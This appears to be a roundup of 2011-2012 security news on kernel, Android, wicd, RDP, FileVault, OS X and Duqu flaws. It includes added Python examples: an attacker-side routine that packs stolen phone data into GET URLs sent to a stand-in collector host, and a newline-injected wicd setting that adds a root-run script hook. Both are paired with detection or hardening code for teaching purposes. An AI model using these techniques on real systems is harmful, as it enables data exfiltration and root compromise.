64-bit OS & virtualization software running on Intel CPU vulnerable to local privilege escalation

A critical security vulnerability has been discovered in 64-bit operating systems and virtualization software running on Intel CPUs. It is in the handling of the SYSRET instruction (US-CERT VU#649219, CVE-2012-0217) and can be used either for local privilege escalation or for a guest-to-host virtual machine escape.

The problem affects 64-bit versions of Windows, Linux, FreeBSD and the Xen hypervisor. It is specific to Intel hardware: AMD and ARM CPUs are not affected.

"A ring3 attacker may be able to specifically craft a stack frame to be executed by ring0 (kernel) after a general protection exception (#GP)," US-CERT's vulnerability note reads. "The fault will be handled before the stack switch, which means the exception handler will be run at ring0 with an attacker's chosen RSP causing a privilege escalation."
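The mechanism in the US-CERT note, as an added example that is not taken from the note or from any vendor's patch: the canonical-address check that patched kernels apply before taking the SYSRET fast path, and a small model of why the fault lands on an attacker-chosen stack on Intel but not on AMD. The function names, the vendor model and the register values are illustrative assumptions for the demonstration.

```python
# Added example, not taken from the US-CERT note or any vendor's patch: the
# canonical-address check patched kernels apply before SYSRET, and a small model
# of why the Intel behaviour is exploitable. Names and the vendor model are
# illustrative; the register values are assumptions chosen for the demonstration.

VA_BITS = 48  # 4-level paging: bits 63..47 of a canonical address are all equal


def is_canonical(addr: int, va_bits: int = VA_BITS) -> bool:
    """Return True if addr is a canonical x86-64 virtual address."""
    addr &= (1 << 64) - 1
    top = addr >> (va_bits - 1)                 # bit 47 and every bit above it
    all_ones = (1 << (64 - va_bits + 1)) - 1    # 17 one-bits for a 48-bit VA
    return top == 0 or top == all_ones


def choose_return_path(user_rip: int) -> str:
    """The mitigation: use the fast SYSRET path only when the return RIP is
    canonical; otherwise return with IRET, which faults with the kernel's own
    stack pointer still in place, so the #GP handler runs on a sane stack."""
    return "sysret" if is_canonical(user_rip) else "iret"


def gp_handler_context(vendor: str, user_rip: int, user_rsp: int, tss_rsp0: int):
    """Model the #GP raised by SYSRET to a non-canonical RIP.

    SYSRET does not load RSP, so the kernel restores the user's RSP just before
    executing it. Returns (CPL at which the fault is taken, RSP the #GP handler
    starts on), or None when the RIP is canonical and SYSRET succeeds.
    """
    if is_canonical(user_rip):
        return None
    if vendor == "intel":
        # Fault is taken while still at CPL 0: no privilege change, so no TSS
        # stack switch. The handler runs on the attacker-chosen user RSP.
        return (0, user_rsp)
    if vendor == "amd":
        # Fault is taken after the switch to CPL 3: the privilege change makes
        # the CPU load RSP0 from the TSS before entering the handler.
        return (3, tss_rsp0)
    raise ValueError("unknown vendor: " + vendor)


if __name__ == "__main__":
    bad_rip = 0x0000800000000000            # first non-canonical address
    print(choose_return_path(bad_rip))       # iret
    print(gp_handler_context("intel", bad_rip, 0x4141414141410000, 0xFFFF880001234000))
```

The non-canonical RIP is reachable from user space because the kernel returns to whatever RIP a signal handler, ptrace or a crafted syscall return frame leaves in RCX; the fix is simply to refuse the SYSRET shortcut for such values.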

Metasploit founder H.D. Moore characterized the bug as a "serious guest-to-host escape vulnerability," noting that it affects the Xen platform but not VMware.

Operating-system-specific details have been published by Xen, FreeBSD and Microsoft. Red Hat has published two advisories on the problem: RHSA-2012:0720-1 and RHSA-2012:0721-1.

To close the hole, apply the updates from your operating system supplier. On Xen the fix is in the hypervisor itself, so a guest cannot protect itself; the host operator has to patch.

'No permissions' Android app can access sensitive data

Paul Brodeur, a security researcher at Leviathan Security Group, has built a proof-of-concept app called "No Permissions" that demonstrates how an Android application that requests no permissions at all can still reach sensitive data.

Normally, when a user installs an app, Android displays the permissions the app requests and asks for approval. The purpose of the permission list is to tell you exactly what the app will be able to read from your device so that you can decide whether to install it; an app needs a permission even for routine tasks such as network access or keeping the device awake.

Brodeur's research shows that an app with zero permissions can still reach sensitive data: his app reads files on the SD card, files that other apps have stored there, and handset identification data.

Getting the collected data off the device would normally require the INTERNET permission. Unfortunately, there is one network-reaching call that can be made without any permission at all.

"The URI ACTION_VIEW Intent opens a browser. By passing data via GET parameters in a URI, the browser will exfiltrate any collected data. In my tests, I found that the app is able to launch the browser even after it has lost focus, allowing for transmission of large amounts of data by creating successive browser calls," the researcher explained.

He tested the app on Android 4.0.3 and Android 2.3.5. If you are curious about what the app can do, you can download it from here.
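The exfiltration channel described above, modelled end to end as an added example that is not code from Leviathan's "No Permissions" app: the URL chunking an app would do to push a large payload through successive browser launches, and a detector that flags the pattern in proxy logs. The collector host, client addresses, log layout, record contents and alert thresholds are all constructed for this demonstration.

```python
# Added example, not code from Leviathan's "No Permissions" app: the exfiltration
# channel described above modelled end to end, with the URL chunking an app would
# do for successive browser launches and a detector that flags it in proxy logs.
# The collector host, client addresses, log layout, record contents and alert
# thresholds are all constructed for this demonstration.
import base64
import json
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed browser user agents for the two Android versions the app was tested on.
UA_ICS = "Mozilla/5.0 (Linux; U; Android 4.0.3; en-us) AppleWebKit/534.30"
UA_GB = "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us) AppleWebKit/533.1"


def exfil_urls(collector: str, session: str, records: list, max_url: int = 2000) -> list:
    """Attacker side: pack each record into a GET parameter and split it into as
    many URLs as needed, one ACTION_VIEW browser launch per URL."""
    urls = []
    for rec in records:
        blob = base64.urlsafe_b64encode(json.dumps(rec).encode()).decode().rstrip("=")
        head = f"{collector}?s={session}&d="
        room = max_url - len(head)
        for i in range(0, len(blob), room):
            urls.append(head + blob[i:i + room])
    return urls


# Constructed records standing in for what the app can read without permissions.
RECORDS = [
    {"id": "356938035643809", "android": "4.0.3"},
    {"contacts": [{"n": "Alice", "t": "+15550100"}, {"n": "Bob", "t": "+15550101"}]},
    {"sdcard": ["/sdcard/DCIM/Camera/IMG_0001.jpg", "/sdcard/Download/statement.pdf"]},
]

# Constructed proxy log, one 'client method url "user-agent"' line per request.
# A short max_url forces the chunking the researcher describes.
SAMPLE_LOG = "\n".join(
    [f'10.1.1.20 GET {u} "{UA_ICS}"'
     for u in exfil_urls("http://collector.example/c", "3f9a", RECORDS, max_url=120)]
    + [f'10.1.1.21 GET http://news.example/article?id={n} "{UA_GB}"' for n in (42, 43)]
)

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)"$')


def detect_query_exfil(log_text: str, min_calls: int = 3, min_bytes: int = 256) -> list:
    """Defender side: flag (client, host, path) tuples that receive repeated GETs
    carrying a lot of query-string data from an Android browser. Returns
    (client, host, path, calls, query_bytes) for each hit."""
    stats = defaultdict(lambda: [0, 0])
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, method, url, ua = m.groups()
        if method != "GET" or "Android" not in ua:
            continue
        parts = urlsplit(url)
        key = (client, parts.netloc, parts.path)
        stats[key][0] += 1
        stats[key][1] += len(parts.query)
    return sorted(key + (calls, qbytes) for key, (calls, qbytes) in stats.items()
                  if calls >= min_calls and qbytes >= min_bytes)


if __name__ == "__main__":
    for hit in detect_query_exfil(SAMPLE_LOG):
        print("possible GET-parameter exfiltration:", hit)
```

The detector keys on the shape of the traffic rather than on any particular collector, because the app can point the browser anywhere; tune the thresholds against your own proxy baseline before alerting on them.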

WICD privilege escalation 0day affects Backtrack Linux

A student at the InfoSec Institute has found a zero-day vulnerability in the Wireless Interface Connection Daemon (wicd) that affects BackTrack 5.

The finding was published on InfoSec's own website and written up by the student himself, who says that wicd has several design flaws that can be combined into a privilege escalation exploit.

Improper sanitisation of inputs to wicd's D-Bus interfaces lets an attacker (semi-)arbitrarily write configuration options into wicd's 'wireless-settings.conf', including, but not limited to, options that define scripts (executables, in practice) to run on various internal events, for instance on connecting to a wireless network.

These scripts run as the root user, so anyone with access to the wicd D-Bus interface gets arbitrary code or command execution as root.
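The class of bug described in the two paragraphs above, as an added example that is not wicd's own code: an illustrative INI-style settings store with the unsanitised setter beside a hardened one, showing how a caller-controlled value that reaches the file verbatim can add a root-executed script hook. The option names, the "key = value" file format and the script hook names are assumptions modelled on the description, not wicd internals; wicd itself is written in Python, which is why the example is too.

```python
# Added example, not wicd's code: an illustrative configuration store of the kind
# behind this bug, with the unsanitised setter beside a hardened one. The option
# names, the "key = value" file format and the script hook names are assumptions
# modelled on the description above, not wicd internals.
import configparser

# Options an unprivileged D-Bus caller may legitimately set for a network.
ALLOWED_KEYS = {"essid", "bssid", "key", "enctype", "automatic", "ip", "netmask", "gateway", "dns1"}
# Hooks that run as root on connect/disconnect: never settable over the bus.
SCRIPT_KEYS = {"beforescript", "afterscript", "predisconnectscript", "postdisconnectscript"}


def render(store: dict) -> str:
    """Write the store as the daemon's INI-style settings file."""
    lines = []
    for section, opts in store.items():
        lines.append(f"[{section}]")
        lines.extend(f"{k} = {v}" for k, v in opts.items())
    return "\n".join(lines) + "\n"


def load(text: str) -> dict:
    """Parse the settings file back the way the daemon would before acting on it."""
    cp = configparser.RawConfigParser()
    cp.read_string(text)
    return {s: dict(cp.items(s)) for s in cp.sections()}


def set_property_unsafe(store: dict, network: str, key: str, value: str) -> None:
    """Vulnerable: stores the caller-supplied key and value verbatim. A newline
    in either one becomes an extra 'key = value' line when the file is written,
    and the parser then honours it as a separate option."""
    store.setdefault(network, {})[key] = value


def set_property_safe(store: dict, network: str, key: str, value: str) -> None:
    """Hardened: whitelist the option, forbid control characters in every field
    that ends up in the file, and bound the length."""
    if not network.isalnum() or len(network) > 32:
        raise ValueError(f"bad network id {network!r}")
    if key in SCRIPT_KEYS or key not in ALLOWED_KEYS:
        raise ValueError(f"option not settable over D-Bus: {key!r}")
    if len(value) > 256 or not value.isprintable():  # rejects \n, \r, \x00, ...
        raise ValueError("value contains control characters or is too long")
    store.setdefault(network, {})[key] = value


def rejects(setter, *args) -> bool:
    """True if the setter refuses the call (used by the demonstration below)."""
    try:
        setter(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "CoffeeShop\nbeforescript = /tmp/evil.sh"   # injected hook, would run as root
    vulnerable = {}
    set_property_unsafe(vulnerable, "0", "essid", payload)
    print(load(render(vulnerable))["0"])   # {'essid': 'CoffeeShop', 'beforescript': '/tmp/evil.sh'}
    hardened = {}
    print(rejects(set_property_safe, hardened, "0", "essid", payload))                 # True
    print(rejects(set_property_safe, hardened, "0", "beforescript", "/tmp/evil.sh"))   # True
```

The whitelist is the important half: even with newline filtering, a privileged daemon must not let an unprivileged bus client name options that select what runs as root.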
The researchers initially called the bug a "Backtrack 5 R2 priv escalation 0day". They later realised the mistake, renamed it "wicd Privilege Escalation 0Day" and apologised to the BackTrack team and anyone else affected by the error.

"To summarise, we believe that the intentional misrepresentation of this bug report has discredited BackTrack unnecessarily in the eyes of those who do not understand the underlying mechanisms of our OS, and also discredited the Infosec Institute in the eyes of those who do," the BackTrack team commented on the issue.

The wicd team has released a new version that fixes the bug (CVE-2012-2095).

Hackers developed Exploit code for RDP vulnerability

Chinese hackers have released proof-of-concept (PoC) code that attempts to exploit the recently patched Windows RDP vulnerability. When Microsoft released the patch, it urged customers to apply it as soon as possible because it expected a working exploit to appear within 30 days. It took less than three days.

SophosLabs researchers found a Chinese website hosting exploit code written in Python. The script targets the MS12-020 RDP vulnerability and causes Windows computers to blue-screen.

Although the script only causes a crash for now, the fear is that it will not take attackers long to turn a reliable trigger into a fast-spreading Internet worm.

Researchers also came across a fake exploit for the Microsoft RDP vulnerability that claims to be the Python script of a worm. "It references a Python module that doesn't exist (FreeRDP), and claims to be written by, an obvious reference to the high profile Anonymous hacker who was recently revealed to have been secretly working for the FBI for months," the researcher said.

Hackers offer more than 1400$ for developing windows RDP exploit

A website where software developers can hire each other carries an ad promising more than $1,400 (currently $1,451) to the first person who develops a working exploit for the Windows RDP vulnerability.

Because it is listed as an open-source bounty, the reward grows as time passes. When security journalist Brian Krebs came across the listing, the bounty stood at $1,435.

Microsoft has already patched the vulnerability and urged users to update. Many fail to do so, which is why criminals are rushing to get a working exploit released.

"I'd like to see a working exploit for CVE-2012-0002 (the new RDP hole) as a Metasploit module," a user named Rich wrote.

Krebs noted that the bounty is almost certainly far less than such a weapon would fetch on the underground market, or even what a legitimate vulnerability-purchase programme such as TippingPoint's would pay for the research.

Forensics Vendor Passware warns Mac OS X FileVault 2 easily decrypted

Passware, Inc., a vendor of password-recovery tools for law enforcement, has announced that its forensic toolkit can break the disk encryption in Mac OS X.

The original FileVault encrypts the user's home directory with 128-bit AES; FileVault 2, introduced in OS X 10.7 Lion, encrypts the whole startup volume. A master password (and, in 10.7 and later, a recovery key) is created in case the user loses the login password.

Passware Kit Forensic v11.3 claims to decrypt a FileVault-encrypted Mac disk within 40 minutes, regardless of the length or complexity of the password. It does this not by guessing the password but by extracting the FileVault encryption key from the target computer's memory, which then gives full access to the encrypted disk. That only works while the volume is unlocked and the key is in RAM, and it needs physical access to the running machine (a live memory acquisition or a memory image); a Mac that has been shut down, rather than put to sleep, has no key left to recover.

"Full disk encryption is becoming a major obstacle for digital investigations," said Dmitry Sumin, president of Passware, Inc. "The latest version of Passware Kit Forensic offers multiple approaches to overcoming this problem, such as live memory analysis and extraction of encryption keys for BitLocker, TrueCrypt, and FileVault. This means forensic experts are better armed to approach investigative challenges with an effective and efficient solution that significantly reduces decryption time and thus allows investigators to focus on data analysis."

Passware Kit Forensic is available directly from Passware for $995 with one year of free updates; the company markets it primarily to law enforcement.

Critical Zero-Day Vulnerability found in 64 bit version of Windows 7

A security researcher known as webDEViL has discovered a zero-day vulnerability in the 64-bit version of Windows 7 that allows an attacker to compromise a vulnerable machine; Secunia has published an advisory on it.

The researcher (w3bd3vil on Twitter) tweeted that the bug can be triggered simply by loading an iframe with an overly large height attribute in Safari.

"The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large "height" attribute viewed using the Apple Safari browser. Successful exploitation may allow execution of arbitrary code with kernel-mode privileges," the Secunia advisory says.

Note that Safari is only the trigger in the published case: the flaw is in the kernel-mode win32k.sys driver, so an exploit that works does not depend on a browser bug and runs with kernel privileges rather than the browser's.

Critical Vulnerability found in Apple Mac OS X Sandbox Mechanisms

CoreLabs researchers have discovered a critical vulnerability in Mac OS X's sandboxing mechanism. They published their advisory on 10 November 2011.

Vulnerability Description

Several of the default pre-defined sandbox profiles do not properly limit all the available mechanisms, so a sandboxed process can still exercise part of the restricted functionality. Specifically, sending Apple events is possible within the no-network sandbox (kSBXProfileNoNetwork). A compromised application restricted by the no-network profile may therefore reach network resources by using Apple events to make another application, one not restricted by the sandbox, do the work on its behalf.

A similar issue was reported by Charlie Miller in his talk at Black Hat Japan 2008, where he described a few processes that are sandboxed by default and a way to circumvent the protection. Some time after the talk Apple tightened those specific profiles by restricting Apple events, but did not change the generic profiles. Until the generic profiles are fixed, a custom profile that additionally denies the appleevent-send operation closes this route.

According to the advisory, Apple Mac OS X 10.7.x, 10.6.x and 10.5.x are vulnerable; Mac OS X 10.4 is not.

Apple Exiles Charlie Miller( A Serial Hacker) for publishing iPhone exploit

Apple has expelled security researcher Charlie Miller from its developer program, sending a clear message to malicious hackers and security researchers alike: keep your hands off the App Store.

Miller has exposed many critical vulnerabilities in Apple's Mac and mobile platforms. Most recently he found a way to sneak a fully malicious app onto an iPhone or iPad right under Apple's nose.

At the SyScan conference in Taiwan next week, Miller plans to present a method that exploits a flaw in Apple's code-signing restrictions on iOS devices, the security measure that allows only Apple-approved code to run in an iPhone's or iPad's memory. Using this method (Miller has already planted a sleeper app in the App Store to demonstrate it), an app can phone home to a remote computer, download new unapproved code onto the device and execute it at will: stealing the user's photos, reading contacts, making the phone vibrate or play sounds, or otherwise repurposing normal iOS app functions for malicious ends.

“Now you could have a program in the App Store like Angry Birds that can run new code on your phone that Apple never had a chance to check,” says Miller. “With this bug, you can’t be assured of anything you download from the App Store behaving nicely.”

A few hours later, Apple sent an email stating: "This letter serves as notice of termination of the iOS Developer Program License Agreement…between you and Apple".

Video Demo of iPhone Bug:

In February, Apple invited security researchers to join its developer program to test its Lion operating system. Miller says he had already paid for his own developer licence. "They went out of their way to let researchers in, and now they're kicking me out for doing research," Miller says. "I didn't have to report this bug. Some bad guy could have found it instead and developed real malware."

According to Forbes, Miller's application has now been removed from the App Store.

Zero-day Vulnerability in Windows Kernel exploited by Duqu worm

Researchers at the Laboratory of Cryptography and System Security (CrySyS Lab) found a zero-day vulnerability in the Windows kernel while analysing the Duqu malware, and immediately reported it to Microsoft. The flaw is in the kernel-mode handling of TrueType fonts in win32k.sys and was later assigned CVE-2011-3402.

CrySyS had earlier obtained the Duqu binaries and confirmed that they are nearly identical to Stuxnet. Until now, nobody had been able to find the installer, so nobody knew how Duqu initially infected systems.

CrySyS found that the installer is a Microsoft Word document (.doc) that exploits the previously unknown kernel vulnerability; opening the document infects the system.

W32.Duqu is a worm that opens a back door and downloads further files onto the compromised computer. It also has rootkit functionality and may steal information from the compromised machine.

Duqu Infection:

"The Word document was crafted in such a way as to definitively target the intended receiving organization. Furthermore, the shell-code ensured that Duqu would only be installed during an eight-day window in August. Please note that this installer is the only installer to have been recovered at the time of writing—the attackers may have used other methods of infection in different organizations," the Symantec report says.

Once a system is infected, the attacker controls it and can move on to other organisations through social engineering. In one organisation, evidence showed the attackers commanding Duqu to spread across SMB shares.

Even when an infected system had no way to reach the Internet, the malware was configured to communicate with the C&C server through another infected system that did have a connection.

Duqu thus creates a bridge between the network's internal servers and the C&C server, giving the attackers access to Duqu infections in secure zones by using computers outside the secure zone as proxies.

Several countries have been hit by Duqu; according to the Symantec report, infections have been found in eight countries.

Analysis also showed the malware contacting a server hosted in India.

"Microsoft is collaborating with our partners to provide protections for a vulnerability used in targeted attempts to infect computers with the Duqu malware. We are working diligently to address this issue and will release a security update for customers through our security bulletin process," Jerry Bryant, group manager of response communications in Microsoft's Trustworthy Computing group, said in a statement.

Symantec has published an updated whitepaper (version 1.3).

Ubuntu 10.10 vulnerable to system crash and DOS attack

Ubuntu has published a security notice for the OMAP4 kernel in Ubuntu 10.10 covering several flaws. Among them: the kernel incorrectly handled certain VLAN packets, so a remote attacker could send specially crafted traffic to crash the system (a denial of service), and the EFI GUID partition table was not parsed correctly, so a physically present attacker who can plug in a mountable device could crash the system or possibly gain root privileges. The full notice follows.
Ubuntu Security Notice USN-1220-1
September 29, 2011

linux-ti-omap4 vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 10.10


Multiple kernel flaws have been fixed.

Software Description:
- linux-ti-omap4: Linux kernel for OMAP4


Ryan Sweat discovered that the kernel incorrectly handled certain VLAN
packets. On some systems, a remote attacker could send specially crafted
traffic to crash the system, leading to a denial of service.

Timo Warns discovered that the EFI GUID partition table was not correctly
parsed. A physically local attacker that could insert mountable devices
could exploit this to crash the system or possibly gain root privileges.

Dan Rosenberg discovered that the IPv4 diagnostic routines did not
correctly validate certain requests. A local attacker could exploit this to
consume CPU resources, leading to a denial of service. (CVE-2011-2213)

Dan Rosenberg discovered that the Bluetooth stack incorrectly handled
certain L2CAP requests. If a system was using Bluetooth, a remote attacker
could send specially crafted traffic to crash the system or gain root
privileges. (CVE-2011-2497)

Mauro Carvalho Chehab discovered that the si4713 radio driver did not
correctly check the length of memory copies. If this hardware was
available, a local attacker could exploit this to crash the system or gain
root privileges. (CVE-2011-2700)

Herbert Xu discovered that certain fields were incorrectly handled in
Generic Receive Offload (GRO) processing. (CVE-2011-2723)

Timo Warns discovered that long symlinks were incorrectly handled on Be
filesystems. A local attacker could exploit this with a malformed Be
filesystem and crash the system, leading to a denial of service.

Dan Kaminsky discovered that the kernel incorrectly handled random sequence
number generation. An attacker could use this flaw to possibly predict
sequence numbers and inject packets. (CVE-2011-3188)

Darren Lavender discovered that the CIFS client incorrectly handled certain
large values. A remote attacker with a malicious server could exploit this
to crash the system or possibly execute arbitrary code as the root user.

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 10.10:
linux-image-2.6.35-903-omap4 2.6.35-903.25

After a standard system update you need to reboot your computer to make
all the necessary changes.

CVE-2011-1576, CVE-2011-1776, CVE-2011-2213, CVE-2011-2497,
CVE-2011-2700, CVE-2011-2723, CVE-2011-2928, CVE-2011-3188,

Package Information: